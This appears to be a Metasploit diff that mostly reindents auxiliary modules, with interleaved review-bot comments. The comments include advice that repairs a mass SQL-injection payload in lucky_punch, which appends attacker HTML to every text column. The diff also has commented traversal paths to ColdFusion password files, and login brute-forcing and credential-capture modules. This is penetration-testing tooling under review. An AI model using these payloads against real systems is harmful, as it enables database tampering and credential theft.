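Review bot: `if (res)` after `res = udp_sock.read(1024).split(/\x00/)` is always true — `split` returns an Array, which is truthy even when empty — so the `else` branch that prints "Unable to determine version info" is unreachable, and a short or malformed reply makes `res[2] + "_" + res[1]` raise NoMethodError on nil, which the `rescue ::Rex::ConnectionError` / `::Errno::EPIPE` clauses do not catch; the reindent keeps this as is. A field-count check fixes both: `if res && res.length > 2`. Because `disconnect_udp` sits before the `rescue` clauses, it is also skipped whenever anything raises, so moving it into an `ensure` would release the socket on the error path. If `read` can return nil on timeout (not visible here), `split` itself would raise first and the read result should be guarded separately. The enclosing method starts before the hunk.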
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially - recover authentication credentials to Axis services. + recover authentication credentials to Axis services. }, 'References' => [ diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index d425cf2003..5e073aec3c 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary begin normalres = send_request_cgi({ - 'uri' => datastore['PATH'], - 'vars_get' => gvars, - 'method' => datastore['METHOD'], + 'uri' => datastore['PATH'], + 'vars_get' => gvars, + 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => datastore['COOKIE'], - 'data' => datastore['DATA'] + 'cookie' => datastore['COOKIE'], + 'data' => datastore['DATA'] }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout 
@@ -183,15 +183,14 @@ class Metasploit3 < Msf::Auxiliary if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) - #true_false_dist = edit_distance(falseres.body,trueres.body) + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) + #true_false_dist = edit_distance(falseres.body,trueres.body) + #print_status("rellenf #{relfalsesize}") - #print_status("rellenf #{relfalsesize}") - - if reltruesize > relfalsesize - print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") + if reltruesize > relfalsesize + print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") report_note( :host => ip, @@ -200,9 +199,8 @@ class Metasploit3 < Msf::Auxiliary :type => 'BLIND_SQL_INJECTION', :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else print_status("NO False Response.") 
@@ -289,15 +287,14 @@ class Metasploit3 < Msf::Auxiliary if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) - #true_false_dist = edit_distance(falseres.body,trueres.body) + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) + #true_false_dist = edit_distance(falseres.body,trueres.body) + #print_status("rellenf #{relfalsesize}") - #print_status("rellenf #{relfalsesize}") - - if reltruesize > relfalsesize - print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") + if reltruesize > relfalsesize + print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") report_note( :host => ip, @@ -307,8 +304,8 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else print_status("NO False Response.") diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f2438bda10..d0f5d9284f 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb 
@@ -93,13 +93,14 @@ class Metasploit3 < Msf::Auxiliary end #URL's that may work for you: - #"/CFIDE/administrator/enter.cfm", - #"/CFIDE/wizards/common/_logintowizard.cfm", - #"/CFIDE/administrator/archives/index.cfm", - #"/CFIDE/install.cfm", - #"/CFIDE/administrator/entman/index.cfm", - #"/CFIDE/administrator/logging/settings.cfm", +#"/CFIDE/administrator/enter.cfm", +#"/CFIDE/wizards/common/_logintowizard.cfm", +#"/CFIDE/administrator/archives/index.cfm", +#"/CFIDE/install.cfm", +#"/CFIDE/administrator/entman/index.cfm", +#"/CFIDE/administrator/logging/settings.cfm", + #Files to grab - #../../../../../../../../../../ColdFusion8/lib/password.properties%00en - #../../../../../../../../../../CFusionMX7/lib/password.properties%00en - #../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en +#../../../../../../../../../../ColdFusion8/lib/password.properties%00en +#../../../../../../../../../../CFusionMX7/lib/password.properties%00en +#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 2ecdb56cce..523534ea1f 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary 'Copy_', 'Copy', '_' - ] + ] tpathf = datastore['PATH'] diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index ddfae8d814..319642a46a 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.code >= 200 and res.code < 300) if res.to_s.include? "Index of /" and res.to_s.include? "<h1>Index of /" - print_status("Found Directory Listing #{wmap_base_url}#{tpath}") + print_status("Found Directory Listing #{wmap_base_url}#{tpath}") report_note( :host => ip, 
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary end if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>" - print_status("Found Directory Listing #{wmap_base_url}#{tpath}") + print_status("Found Directory Listing #{wmap_base_url}#{tpath}") report_note( :host => ip, diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index 7e452203c0..047613f7b5 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -18,11 +18,14 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Archive.org stored URLs for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of - replaying during a web assessment. Finding unlinked and old pages. }, + 'Description' => %q{ + This module pulls and parses the URLs stored by Archive.org for the purpose of + replaying during a web assessment. Finding unlinked and old pages. + }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'Version' => '$Revision$' + )) register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index d9ed562b64..2562f9e41a 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb 
@@ -103,18 +103,17 @@ class Metasploit3 < Msf::Auxiliary # Send normal request to check if error is generated # (means the error is caused by other means) # - # + # begin normalres = send_request_cgi({ - 'uri' => datastore['PATH'], - 'vars_get' => gvars, - 'method' => datastore['METHOD'], + 'uri' => datastore['PATH'], + 'vars_get' => gvars, + 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => datastore['COOKIE'], - 'data' => datastore['DATA'] - }, 20) - + 'cookie' => datastore['COOKIE'], + 'data' => datastore['DATA'] + }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE @@ -161,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary # # Test URI Query parameters - # + # found = false @@ -230,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary # # Test DATA parameters - # + # found = false @@ -307,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary # # Test COOKIE parameters - # + # found = false diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index 22e6bf086f..f5ea857e21 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -151,6 +151,6 @@ class Metasploit3 < Msf::Auxiliary end disconnect - end + end end diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 4cb132c45c..84774d99aa 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb 
@@ -51,28 +51,29 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - #Weird to indent for practical reasons. -infstr = %Q{ + # Weird to indent for practical reasons. + infstr = <<-EOF DECLARE @T varchar(255),@C varchar(255) - DECLARE Table_Cursor CURSOR FOR - select a.name,b.name from sysobjects a,syscolumns b - where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) - OPEN Table_Cursor - FETCH NEXT FROM Table_Cursor INTO @T,@C - WHILE(@@FETCH_STATUS=0) - BEGIN - exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''#{datastore['EVIL_HTML']}''') - FETCH NEXT FROM Table_Cursor INTO @T,@C - END - CLOSE Table_Cursor - DEALLOCATE Table_Cursor -}.gsub(/(\t|\n|\r)/,"") +DECLARE Table_Cursor CURSOR FOR +select a.name,b.name from sysobjects a,syscolumns b +where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) +OPEN Table_Cursor +FETCH NEXT FROM Table_Cursor INTO @T,@C +WHILE(@@FETCH_STATUS=0) +BEGIN +exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''#{datastore['EVIL_HTML']}''') +FETCH NEXT FROM Table_Cursor INTO @T,@C +END +CLOSE Table_Cursor +DEALLOCATE Table_Cursor +EOF + infstr.gsub!(/(\t|\n|\r)/,"") prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST(" poststr = " AS NVARCHAR(4000));EXEC(@S);" - gvars = queryparse(datastore['QUERY']) #Now its a Hash + gvars = queryparse(datastore['QUERY']) #Now its a Hash if gvars.has_key?(datastore['VULN_PAR']) diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 8ef68caec6..79c5b91b14 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb 
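Review bot: The `infstr.gsub!(/(\t|\n|\r)/,"")` after the new heredoc deletes the line breaks outright, and because the heredoc body now sits at column 0 each line's last token runs into the next line's first (`CURSOR FORselect`, `@T,@CWHILE(`, `ENDCLOSE`), so the generated T-SQL cannot parse. Replace the separators with a space instead, `infstr.gsub!(/[\t\r\n]+/, " ")`, adding `.strip` if a leading space inside the CAST is unwanted. Whether the old `%Q{}` form had the same problem depends on whether its indentation was tabs or spaces, which the diff does not show. Separately, `datastore['EVIL_HTML']` is dropped into the doubled-quoted literal inside `exec('...')` unescaped, so a `'` in it breaks the statement; `datastore['EVIL_HTML'].gsub("'", "''''")` keeps the nesting intact. run_host continues past the hunk.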
@@ -22,8 +22,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'HTTP Open Proxy Detection', 'Version' => '$Revision$', - 'Description' => 'Checks if an HTTP proxy is open. False positive are avoided - verifing the HTTP return code and matching a pattern.', + 'Description' => %q{ + Checks if an HTTP proxy is open. False positive are avoided + verifing the HTTP return code and matching a pattern. + }, 'References' => [ ['URL', 'http://en.wikipedia.org/wiki/Open_proxy'], diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index d7b29554d9..3b5063bad9 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -55,19 +55,19 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - conn = false + conn = false dm = datastore['NoDetailMessages'] extensions= [ 'bak', - 'txt', - 'tmp', - 'old', - 'temp', - 'java', - 'doc', - 'log' + 'txt', + 'tmp', + 'old', + 'temp', + 'java', + 'doc', + 'log' ] tpathfile = Pathname.new(datastore['PATH']) diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 45abd60bb0..8c0d6eb941 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '60317' ], [ 'BID', '37086' ], [ 'CVE', '2009-4189' ], - [ 'OSVDB', '60670' ], + [ 'OSVDB', '60670' ], [ 'URL', 'http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-085/' ], diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index e8ead27afc..a956866af8 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb 
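Review bot: The rewrapped description keeps two typos in the operator-facing text, `False positive are avoided verifing`; since the string is being touched anyway, make it `False positives are avoided by verifying the HTTP return code and matching a pattern.`. The surrounding initialize hash starts and ends outside the hunk.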
@@ -83,11 +83,13 @@ class Metasploit3 < Msf::Auxiliary }, 10) if res - reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, - /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, - /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/, - /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, - /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/ + reg_info = [ + /<td>UserId<\/td><td>(\w+.*)<\/td>/, + /<td>Password<\/td><td>(\w+.*)<\/td>/, + /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, + /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/, + /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, + /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/ ] print_status ("DETAIL: #{turl}") reg_info.each do |reg| diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 7c972d6356..57a729aad3 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary $uri = datastore['URI'].to_s if (user.length == 0 and pass.length == 0) - print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs without credentials") + print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs without credentials") begin res = send_request_raw({ @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end else - print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs with given credentials") + print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs with given credentials") do_login(user, pass) end diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index 8adfdb57ad..ee2adadbb8 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb 
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def do_login(user=nil,pass=nil) post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf" - vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'") + vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'") begin diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 4b1b65a2d0..082a39d9c2 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary 'iNotes/Forms5.nsf', 'iNotes/Forms6.nsf', 'iNotes/Forms7.nsf', - ] + ] check2 = [ 'help/readme.nsf?OpenAbout' diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 7cce0e8ba1..38d898b7b8 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -26,11 +26,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['MC'], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Sep 25 2009')) + 'DisclosureDate' => 'Sep 25 2009' + )) - register_options([Opt::RPORT(407),], self.class) + register_options( + [ + Opt::RPORT(407) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index fc92e9c974..c157ab66a7 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary :active => true ) return :next_user - else + else vprint_error("#{rhost}:#{rport} failed to login as '#{user}'") return end 
diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 3f7ad29daf..23563d3cb9 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -106,17 +106,22 @@ class Metasploit3 < Msf::Auxiliary :pass => pass, :active => true ) - return :next_user + return :next_user + rescue ::RbMysql::AccessDeniedError vprint_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") return :fail + rescue ::RbMysql::Error => e vprint_error("#{rhost}:#{rport} failed to login: #{e.class} #{e}") return :error + rescue ::Interrupt raise $! + rescue ::Rex::ConnectionError return :abort + end end diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index a60aecc283..3731634655 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Enterprise Manager Control SID Discovery', 'Description' => %q{ This module makes a request to the Oracle Enterprise Manager Control Console - in an attempt to discover the SID. + in an attempt to discover the SID. }, 'Version' => '$Revision$', 'References' => diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index a6e3940d72..f7d49add65 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -28,11 +28,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'CG', 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Jan 7 2009')) + 'DisclosureDate' => 'Jan 7 2009' + )) - register_options([Opt::RPORT(1521),], self.class) + register_options( + [ + Opt::RPORT(1521) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) 
diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index f0c39a6618..6796e5c459 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Application Server Spy Servlet SID Enumeration.', 'Description' => %q{ This module makes a request to the Oracle Application Server - in an attempt to discover the SID. + in an attempt to discover the SID. }, 'Version' => '$Revision$', 'References' => @@ -33,7 +33,10 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) - register_options([Opt::RPORT(1158),], self.class) + register_options( + [ + Opt::RPORT(1158) + ], self.class) end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 09446e7c56..97a01968db 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -28,9 +28,12 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) - register_options([Opt::RPORT(1521),], self.class) + register_options( + [ + Opt::RPORT(1521) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 5c6b9a7911..0eeebdaf4a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb 
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], - [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'], + [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'], ], 'Author' => [ 'nebulus' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 6a401ac399..9bbc5ae322 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 751ea1e3a2..4db54d94f1 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ @@ -340,10 +340,10 @@ class Metasploit3 < Msf::Auxiliary # Handle image requests ctypes = { - "jpg" => "image/jpeg", - "jpeg" => "image/jpeg", - "png" => "image/png", - "gif" => "image/gif", + "jpg" => "image/jpeg", + "jpeg" => "image/jpeg", + "png" => "image/png", + "gif" => "image/gif", } req_ext = req.resource.split(".")[-1].downcase @@ -357,11 +357,11 @@ class Metasploit3 < Msf::Auxiliary "\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b" res = - "HTTP/1.1 200 OK\r\n" + - "Host: #{mysrc}\r\n" + - "Content-Type: #{ctype}\r\n" + - "Content-Length: #{data.length}\r\n" + - "Connection: Close\r\n\r\n#{data}" + "HTTP/1.1 200 OK\r\n" + + "Host: #{mysrc}\r\n" + + "Content-Type: #{ctype}\r\n" + + "Content-Length: #{data.length}\r\n" + + "Connection: Close\r\n\r\n#{data}" cli.put(res) return end 
diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index db7af34234..d657013516 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'WebServer' ] + [ 'WebServer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 0510f9c99a..84c241e97c 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index 3a06c09e03..c2da640c98 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index be60211480..13446f7067 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Sniffer' ] + [ 'Sniffer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index b554100a7a..641160377a 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ 
diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index b481d29746..28054301d5 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 2ce8a857dd..11f4d12db8 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary } if(@log_console) - print_status("DNS #{addr[3]}:#{addr[1]} XID #{request.id} (#{lst.join(", ")})") + print_status("DNS #{addr[3]}:#{addr[1]} XID #{request.id} (#{lst.join(", ")})") end if(@log_database) diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb index f8100b1391..4222e4a89e 100644 --- a/modules/auxiliary/server/file_autopwn.rb +++ b/modules/auxiliary/server/file_autopwn.rb @@ -371,7 +371,7 @@ class Metasploit3 < Msf::Auxiliary src = nil else print_status("404ing #{request.uri}") - send_not_found(cli) + send_not_found(cli) end cli.send_response(response) else @@ -427,7 +427,7 @@ class Metasploit3 < Msf::Auxiliary aret['ctype'] = "text/html" aret['cdisp'] = false when ".exe" then - aret['ctype'] = "application/octet-stream" + aret['ctype'] = "application/octet-stream" aret['cdisp'] = false when ".pdf" then # diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 53624e7082..44ce577c56 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb 
@@ -16,7 +16,7 @@ require 'rex/proto/proxy/socks4a' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Socks4a Proxy Server', @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Proxy' ] + [ 'Proxy' ] ], 'PassiveActions' => [ @@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary OptPort.new( 'SRVPORT', [ true, "The port to listen on.", 1080 ] ) ], self.class ) end - + def setup super @mutex = ::Mutex.new @socks4a = nil end - + def cleanup @mutex.synchronize do if( @socks4a ) @@ -58,19 +58,19 @@ class Metasploit3 < Msf::Auxiliary end super end - + def run opts = { 'ServerHost' => datastore['SRVHOST'], 'ServerPort' => datastore['SRVPORT'] } - + @socks4a = Rex::Proto::Proxy::Socks4a.new( opts ) - + print_status( "Starting the socks4a proxy server" ) - + @socks4a.start - + @socks4a.join end diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 